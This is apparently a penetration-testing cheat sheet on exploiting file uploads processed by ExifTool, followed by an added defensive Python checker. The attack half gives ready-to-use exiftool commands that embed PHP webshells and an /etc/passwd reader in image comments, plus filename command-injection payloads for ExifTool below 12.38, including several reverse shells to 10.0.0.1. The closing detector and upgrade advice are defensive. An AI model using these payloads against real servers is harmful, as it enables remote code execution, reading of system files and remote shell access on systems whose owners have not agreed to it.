File Upload Attack on Exiftool

If a website uses ExifTool to analyze uploaded files, we may be able to exploit its vulnerabilities.

Polyglot Attack

We may be able to achieve remote code execution by turning a plain image file into a polyglot that is also valid PHP.
First, create a blank image file with ImageMagick as below; this step is not required if you already have an image file.

convert -size 32x32 xc:white test.jpg

Then embed the PHP payload in the image's Comment tag with exiftool.

# Single command
exiftool -Comment="<?php system('ls'); ?>" example.png

# Command taken from the cmd query parameter (inner quotes must be double quotes so the shell keeps the PHP string intact)
exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' exploit.png

# Read a file; -o writes the result to a new file with a .php extension
exiftool -Comment="<?php echo 'START ' . file_get_contents('/etc/passwd') . ' END'; ?>" example.jpg -o polyglot.php
Command Injection (version < v12.38)

On ExifTool versions lower than 12.38, we can inject an OS command through the filename of the uploaded file: ExifTool handed the filename to Perl's open(), which treats a name ending in `|` as a command to run and read output from, so the trailing pipe in the payloads below is what makes the injection work.

# Ping
filename="touch test; ping -c 1 10.0.0.1 |"

# Reverse shell
filename="touch test; bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 |"
filename="touch test; bash -c \"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1\" |"
filename="touch test; python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"10.0.0.1\", 1234));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"bash\")' |"
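As an added defensive example (not part of the original page), a small Python checker an upload handler can run around its ExifTool call. It parses JPEG COM segments and PNG tEXt chunks itself, so a PHP open tag planted through the Comment tag (the polyglot above) is flagged without re-running exiftool, and it whitelists upload filenames so a name ending in `|` (the command injection above) never reaches exiftool < 12.38. The sample files are constructed inline and the function names are mine.

```python
import re
import struct
import zlib

# A PHP open tag has no business inside image metadata (the polyglot indicator).
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)
# Only plain names reach the metadata tool; spaces, ';', '|' and quotes never do.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(jpe?g|png)$")

def jpeg_comments(data: bytes):
    """Yield the payload of every JPEG COM (FF FE) segment before the image data."""
    pos = 2
    while data[:2] == b"\xff\xd8" and pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):            # EOI / SOS: no more metadata segments
            return
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if marker == 0xFE:
            yield data[pos + 4:pos + 2 + length]
        pos += 2 + length

def png_text_chunks(data: bytes):
    """Yield the payload of every PNG tEXt chunk (where exiftool writes PNG:Comment)."""
    pos = 8
    while data[:8] == b"\x89PNG\r\n\x1a\n" and pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if ctype == b"tEXt":
            yield data[pos + 8:pos + 8 + length]
        elif ctype == b"IEND":
            return
        pos += 12 + length                    # length + type + data + CRC

def has_embedded_php(data: bytes) -> bool:
    """True if any comment/text segment carries a PHP open tag."""
    return any(PHP_TAG.search(t) for t in [*jpeg_comments(data), *png_text_chunks(data)])

def safe_upload_name(name: str) -> bool:
    """True only for plain names; a trailing '|' or shell metacharacters fail here."""
    return SAFE_NAME.fullmatch(name) is not None

def _png_chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

# Constructed samples: a minimal JPEG with one COM segment and a minimal PNG with one tEXt chunk.
PHP = b"<?php system('ls'); ?>"
BAD_JPEG = b"\xff\xd8\xff\xfe" + struct.pack(">H", len(PHP) + 2) + PHP + b"\xff\xd9"
BAD_PNG = b"\x89PNG\r\n\x1a\n" + _png_chunk(b"tEXt", b"Comment\x00" + PHP) + _png_chunk(b"IEND", b"")

if __name__ == "__main__":
    print(has_embedded_php(BAD_JPEG), has_embedded_php(BAD_PNG), safe_upload_name("cat.jpg"))
```

Upgrading to ExifTool 12.38 or later and storing uploads under a server-generated name removes the filename vector; the content check is defence in depth against polyglots, which a version upgrade does not address.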